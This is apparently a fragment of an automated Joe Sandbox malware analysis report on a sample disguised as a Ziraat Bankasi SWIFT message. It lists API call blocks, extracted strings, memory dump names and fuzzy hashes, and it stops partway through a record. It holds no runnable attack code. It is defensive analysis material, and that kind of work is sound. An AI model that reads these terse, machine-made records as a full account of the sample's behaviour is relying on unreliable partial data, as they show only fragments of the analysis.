                                                                                                                                                        • Opcode Fuzzy Hash: f0c12c12ff77a043cc68fd73506625bca6313bbfc0033dd6d0f02a58ef51a964
                                                                                                                                                        • Instruction Fuzzy Hash: 68E086726012119BD7602FF16C0CB973BECEF55791F018818F2C5DA040DFB48481C760
                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColor.USER32(00000008), ref: 0009B496
                                                                                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 0009B4A0
                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0009B4B5
                                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 0009B4BD
                                                                                                                                                        • GetWindowDC.USER32(?,00000000), ref: 000FDE2B
                                                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 000FDE38
                                                                                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 000FDE51
                                                                                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 000FDE6A
                                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 000FDE8A
                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 000FDE95
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1946975507-0
                                                                                                                                                        • Opcode ID: 349b139431122f400a8d8342534a09164f8671b193266e8e31a91c63463f8f27
                                                                                                                                                        • Instruction ID: ec37e00568aa4957132e432e765ee091b6db04f735763efa0fe92fe5cd50d071
                                                                                                                                                        • Opcode Fuzzy Hash: 349b139431122f400a8d8342534a09164f8671b193266e8e31a91c63463f8f27
                                                                                                                                                        • Instruction Fuzzy Hash: 7AE0ED31100244AADF616BB4BC0DBE83F51AB55339F14C666FBA9584E1CBB18591EB11
                                                                                                                                                        APIs
                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000BB2DF
                                                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 000BB2EB
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 000BB2F4
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 000BB2FC
                                                                                                                                                          • Part of subcall function 000BAB24: GetProcessHeap.KERNEL32(00000000,?,000BA848), ref: 000BAB2B
                                                                                                                                                          • Part of subcall function 000BAB24: HeapFree.KERNEL32(00000000), ref: 000BAB32
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 146765662-0
                                                                                                                                                        • Opcode ID: 487b8b8df215ebd27f682392c15c8eec06bbf43e589c53f7795f544c7a0ba629
                                                                                                                                                        • Instruction ID: fe1c39a488de03fb89480c274b05812678bc39af5de0bba969a657e5e411f880
                                                                                                                                                        • Opcode Fuzzy Hash: 487b8b8df215ebd27f682392c15c8eec06bbf43e589c53f7795f544c7a0ba629
                                                                                                                                                        • Instruction Fuzzy Hash: 2EE0B67A104005BBCB012BE5EC08899FFB6FF893213109221F66581971CF72A8B1EB91
                                                                                                                                                        APIs
                                                                                                                                                        • __getptd_noexit.LIBCMT ref: 000A3FAE
                                                                                                                                                          • Part of subcall function 000A7A25: GetLastError.KERNEL32(00000001,0009F507,000A7C13,000A39E3,?,?,0009F507,?,0000000E), ref: 000A7A27
                                                                                                                                                          • Part of subcall function 000A7A25: __calloc_crt.LIBCMT ref: 000A7A48
                                                                                                                                                          • Part of subcall function 000A7A25: GetCurrentThreadId.KERNEL32 ref: 000A7A71
                                                                                                                                                          • Part of subcall function 000A7A25: SetLastError.KERNEL32(00000000,0009F507,?,0000000E), ref: 000A7A89
                                                                                                                                                        • CloseHandle.KERNEL32(?,?,000A3F8D), ref: 000A3FC2
                                                                                                                                                        • __freeptd.LIBCMT ref: 000A3FC9
                                                                                                                                                        • ExitThread.KERNEL32 ref: 000A3FD1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 408300095-0
                                                                                                                                                        • Opcode ID: aba81701fed2303e9e581a7bda48ef9a4ed8c42647c3c5328da30fac4f2d0046
                                                                                                                                                        • Instruction ID: 534775a5aba275b050c6576514433236b6d38bef53574ef3945457ab7977324b
                                                                                                                                                        • Opcode Fuzzy Hash: aba81701fed2303e9e581a7bda48ef9a4ed8c42647c3c5328da30fac4f2d0046
                                                                                                                                                        • Instruction Fuzzy Hash: 46D0A731445E105FC57127E0AC0965E77A07F02721B049325F069094E2CF604A418682
                                                                                                                                                        APIs
                                                                                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 000BDEAA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ContainedObject
                                                                                                                                                        • String ID: AutoIt3GUI$Container
                                                                                                                                                        • API String ID: 3565006973-3941886329
                                                                                                                                                        • Opcode ID: 674d2f804e65c1031d27cc7759d23cd0173db83a07676285a4fbbbcab82883d5
                                                                                                                                                        • Instruction ID: 0c882a820f467b865bffd11e7f89a301bd2ffe35e16aee675e97db13b2ac3b83
                                                                                                                                                        • Opcode Fuzzy Hash: 674d2f804e65c1031d27cc7759d23cd0173db83a07676285a4fbbbcab82883d5
                                                                                                                                                        • Instruction Fuzzy Hash: E1913770600602AFDB64DF64C884BAAB7F5FF48714F10846EF84ADB291EB71E841CB60
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009C6F4: _wcscpy.LIBCMT ref: 0009C717
                                                                                                                                                          • Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
                                                                                                                                                          • Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF
                                                                                                                                                        • __wcsnicmp.LIBCMT ref: 000CDEFD
                                                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 000CDFC6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                        • String ID: LPT
                                                                                                                                                        • API String ID: 3222508074-1350329615
                                                                                                                                                        • Opcode ID: a4a3a71566bc987368cadcbdad92ce0c11e8570fd28f8b02f91d1d6eff333f61
                                                                                                                                                        • Instruction ID: c44deaac78cbde90532f4689e1a58d64565e7d7dfc87355049ecee1c52011fd4
                                                                                                                                                        • Opcode Fuzzy Hash: a4a3a71566bc987368cadcbdad92ce0c11e8570fd28f8b02f91d1d6eff333f61
                                                                                                                                                        • Instruction Fuzzy Hash: D0616975A00215AFCB14EF98C891FEEB7F4BB18310F15406EF546AB291DB70AE81DB90
                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 0009BCDA
                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 0009BCF3
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                                                        • Opcode ID: dc09fa62c3c5d1fb90db05adec4a32c403902e5ceffaa8ed72fe830cce4e2ddc
                                                                                                                                                        • Instruction ID: cf2a99d324237b1fe3275df778803df2d01eda53cc36052933421d774a95de60
                                                                                                                                                        • Opcode Fuzzy Hash: dc09fa62c3c5d1fb90db05adec4a32c403902e5ceffaa8ed72fe830cce4e2ddc
                                                                                                                                                        • Instruction Fuzzy Hash: 695136B1409744ABE720AF54EC86BAFBBE8FF94354F41484EF5C8410A2DB7185A8D752
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000844ED: __fread_nolock.LIBCMT ref: 0008450B
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000CC65D
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000CC670
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                                                                                        • String ID: FILE
                                                                                                                                                        • API String ID: 4029003684-3121273764
                                                                                                                                                        • Opcode ID: 74c774d4d381af26e6e40940b6489d43de76da382582b58762ccbb0cf37a90f6
                                                                                                                                                        • Instruction ID: 03e856acee9540df9195e423cb5b5068e4da8ca0576cfecb8708714ac8758cc1
                                                                                                                                                        • Opcode Fuzzy Hash: 74c774d4d381af26e6e40940b6489d43de76da382582b58762ccbb0cf37a90f6
                                                                                                                                                        • Instruction Fuzzy Hash: B341B472A0021ABBDF21ABA4DC42FEF77B9EF49714F000469F645EB182D7759A04CB61
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 000C51C6
                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000C5201
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                                                        • Opcode ID: c6b471d5354e3d7c1e34bfaebb54f683ecfb02a83d1e89a9cc33e8de8e1b46c2
                                                                                                                                                        • Instruction ID: 27ab53acb66826d21b45f1b90564b3c5cf33ad9193d7a8e834054ee8b8ab855f
                                                                                                                                                        • Opcode Fuzzy Hash: c6b471d5354e3d7c1e34bfaebb54f683ecfb02a83d1e89a9cc33e8de8e1b46c2
                                                                                                                                                        • Instruction Fuzzy Hash: FA31D239600705ABEB64CF99DC45FAEBBF8BF46352F14401DE981A61A1E770AAC4DB10
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F
                                                                                                                                                        • GetActiveWindow.USER32 ref: 000EDA7B
                                                                                                                                                        • EnumChildWindows.USER32(?,000ED75F,00000000), ref: 000EDAF5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                                                        • String ID: T1
                                                                                                                                                        • API String ID: 3814560230-739779697
                                                                                                                                                        • Opcode ID: de62aa50931986ba9a809ebddd1571bfbc80cd0fcbd73b2f9b7b4e40957bb0ce
                                                                                                                                                        • Instruction ID: 9f1bb85bd2191c4a2f3b17f8f2973fe09d385adbbf23bb4143556e5f87c824dd
                                                                                                                                                        • Opcode Fuzzy Hash: de62aa50931986ba9a809ebddd1571bfbc80cd0fcbd73b2f9b7b4e40957bb0ce
                                                                                                                                                        • Instruction Fuzzy Hash: 9F214F79604201EFC754DF29E850AA673F5EF4A320F1A0619F969973F0E770A880DF50
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 000C52D5
                                                                                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 000C52F4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                                                        • Opcode ID: 9dc4e273c073b5d7c1113bf65c661c3e4780a3ab7588854e1ec70e3c2e9543b9
                                                                                                                                                        • Instruction ID: ef9342882e158a3c82231a7c5532e8116f6af167c77e68a7f95dbc8d89d278dd
                                                                                                                                                        • Opcode Fuzzy Hash: 9dc4e273c073b5d7c1113bf65c661c3e4780a3ab7588854e1ec70e3c2e9543b9
                                                                                                                                                        • Instruction Fuzzy Hash: 3411E27EA01654ABDB60DB98DD04F9D77F8AB46791F040029E942E72E0D3B0FE84CB90
                                                                                                                                                        APIs
                                                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 000D4DF5
                                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 000D4E1E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                                                        • String ID: <local>
                                                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                                                        • Opcode ID: d7ac0b447ddd6b205dc2cff1fde52bdf307b1ac7453cc41e90352aefc505245b
                                                                                                                                                        • Instruction ID: b8f3be26a908a57e169498b49c95dccfa5e0418176b10267b83bfb36b39db1ec
                                                                                                                                                        • Opcode Fuzzy Hash: d7ac0b447ddd6b205dc2cff1fde52bdf307b1ac7453cc41e90352aefc505245b
                                                                                                                                                        • Instruction Fuzzy Hash: D0117C70501321BBDB258FA1C889EFBFBA9FF16755F10822BF55696640D3B05984C6F0
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __snwprintf
                                                                                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                        • API String ID: 2391506597-2584243854
                                                                                                                                                        • Opcode ID: 6f0ab0fae1cda57b4d70dd228d885c90497eda6a8dde1b431776bcfddf806bfe
                                                                                                                                                        • Instruction ID: 17df98b572711d038614ed19de27807fcdc26dbaa4b5849fadde3ad8688ca42c
                                                                                                                                                        • Opcode Fuzzy Hash: 6f0ab0fae1cda57b4d70dd228d885c90497eda6a8dde1b431776bcfddf806bfe
                                                                                                                                                        • Instruction Fuzzy Hash: 08119A32600628AACF11FF90DC82FEE7375BF55740F44006AF545AB283DB75EA458BA9
                                                                                                                                                        APIs
                                                                                                                                                        • inet_addr.WSOCK32(00000000), ref: 000DA84E
                                                                                                                                                        • htons.WSOCK32(00000000), ref: 000DA88B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: htonsinet_addr
                                                                                                                                                        • String ID: 255.255.255.255
                                                                                                                                                        • API String ID: 3832099526-2422070025
                                                                                                                                                        • Opcode ID: 91139a81233e6b9f6231ab158e12c27774244eea64df2255d02ff180886360f5
                                                                                                                                                        • Instruction ID: 7a65a9487a9f36222dde6ad6e59a45376137c7a6eb23e8be0173c86270367326
                                                                                                                                                        • Opcode Fuzzy Hash: 91139a81233e6b9f6231ab158e12c27774244eea64df2255d02ff180886360f5
                                                                                                                                                        • Instruction Fuzzy Hash: C801D675300304ABDB21AFA4D856FEEB3A4EF45314F10842BF915A73D2DB71E8019766
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 000BB7EF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 3850602802-1403004172
                                                                                                                                                        • Opcode ID: dd8b14d952ac0b3b3a41e667ff9660ab9842ba1dc1e26333bd5b5347a4567b22
                                                                                                                                                        • Instruction ID: 98a60b8a421869ff4947188afca38c197f2a6441715218e565f15f4efdc4c2e3
                                                                                                                                                        • Opcode Fuzzy Hash: dd8b14d952ac0b3b3a41e667ff9660ab9842ba1dc1e26333bd5b5347a4567b22
                                                                                                                                                        • Instruction Fuzzy Hash: 1D01DF75640118ABDB14FBA4CC52DFE73B9BF46350B04061EF4A2A72D2EFB05908CBA0
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 000BB6EB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend
